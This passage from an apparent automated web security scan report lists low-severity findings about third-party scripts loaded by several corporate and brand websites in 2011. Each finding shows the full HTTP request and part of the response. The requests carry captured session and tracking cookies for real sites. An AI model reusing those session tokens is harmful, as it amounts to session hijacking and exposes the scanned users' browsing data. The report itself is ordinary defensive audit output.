s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Aind%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FInsights%25252Findex.htm_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 41636
Date: Tue, 06 Sep 2011 16:52:23 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.100. http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; JSESSIONID=TXZLTmHhpV39Bfbyvx40TblHPS1M1Jn7hpPL9l4NkhxHQzhRSMmw!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55506
Date: Tue, 06 Sep 2011 16:52:17 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.101. http://www.deloitte.com/view/en_US/us/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/mobile/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50325
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.102. http://www.deloitte.com/view/en_US/us/search/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/search/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vnum=1747342618651%26vn%3D1; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; JSESSIONID=TXZLTmHhpV39Bfbyvx40TblHPS1M1Jn7hpPL9l4NkhxHQzhRSMmw!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmb=55230644.4.10.1315342619; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=100; SC_LINKS=us%5E%5EDbriefs%5E%5Eus%20%7C%20Dbriefs%5E%5E; s_nr=1315343832177-New; s_invisit=true; s_ppg=us; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitSearchOverlay('Dbriefs')%25253B_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 76178
Date: Tue, 06 Sep 2011 16:17:13 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.103. http://www.dove.us/Products/Hair/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Products/Hair/ HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29399
Date: Tue, 06 Sep 2011 16:45:43 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4dbe77462edfeaf6">
</script>
...[SNIP]...

20.104. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?site=http://www.dove.us/Products/Hair/default.aspx&width=320&height=236&header=false&colorscheme=light&font=arial&border_color=%23ffffff&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.215.54
X-Cnection: close
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Length: 9560

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="kv9c";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

20.105. http://www.fekkai.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?gclid=COTMo_SIiasCFQ6AgwodqEol4A HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Apache
Set-Cookie: fekkai_flash_intro_cookie=True; expires=Wed, 05-Sep-2012 16:45:37 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 16218
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...
<!-- tracking pixel addition 02/01/2010 [begin] -->
<script type="text/javascript" src="http://action.mathtag.com/cnt?id=10384"></script>
...[SNIP]...

20.106. http://www.fekkai.com/categories/conditioners/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /categories/conditioners/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /categories/conditioners/ HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/style/inspiration/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.2.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __unam=9c154fe-13240b5494c-934a40f-1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:57 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 35824
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.107. http://www.fekkai.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.732372977.1315345538.1315345538.1315345538.1; __utmb=243632410.1.10.1315345538; __utmc=243632410; __utmz=243632410.1315345538.1.1.utmgclid=COTMo_SIiasCFQ6AgwodqEol4A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:43 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 9627
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.108. http://www.fekkai.com/images/world_of_fekkai_box.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /images/world_of_fekkai_box.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/world_of_fekkai_box.jpg HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/style/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.1.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:46:51 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 9627
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.109. http://www.fekkai.com/style/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /style/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /style/ HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=7989285.771822656.1315345608.1315345608.1315345608.1; __utmb=7989285.1.10.1315345608; __utmc=7989285; __utmz=7989285.1315345608.1.1.utmgclid=COTMo_SIiasCFQ6AgwodqEol4A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:50 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 23364
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.110. http://www.fekkai.com/style/inspiration/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /style/inspiration/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /style/inspiration/ HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/style/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.1.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:54 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 14593
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...
<div class="shareThis">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=ffdcf23c-1079-4fa0-ad15-79625b75a6ac&amp;type=website&amp;post_services=facebook%2Ctwitter%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga&amp;tabs=web,post"></script>
...[SNIP]...

20.111. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/buy_it_now/product_links.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en_US/buy_it_now/product_links.jsp?upc=047400098978 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:45:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 1552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...
</table>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.112. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:32 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Fri, 04 Mar 2011 11:05:51 GMT
ETag: "29856d-4ff-49da62105c1c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.113. http://www.gillettevenus.com/en_US/images/go_roll.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/images/go_roll.png

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en_US/images/go_roll.png HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:46:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Fri, 04 Mar 2011 11:05:51 GMT
ETag: "29856d-4ff-49da62105c1c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.114. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gillettevenus.com
Path:   /en_US/products/refillables/embrace/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en_US/products/refillables/embrace/index.jsp HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/search/index.jsp?q=razorphonehelpfaq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
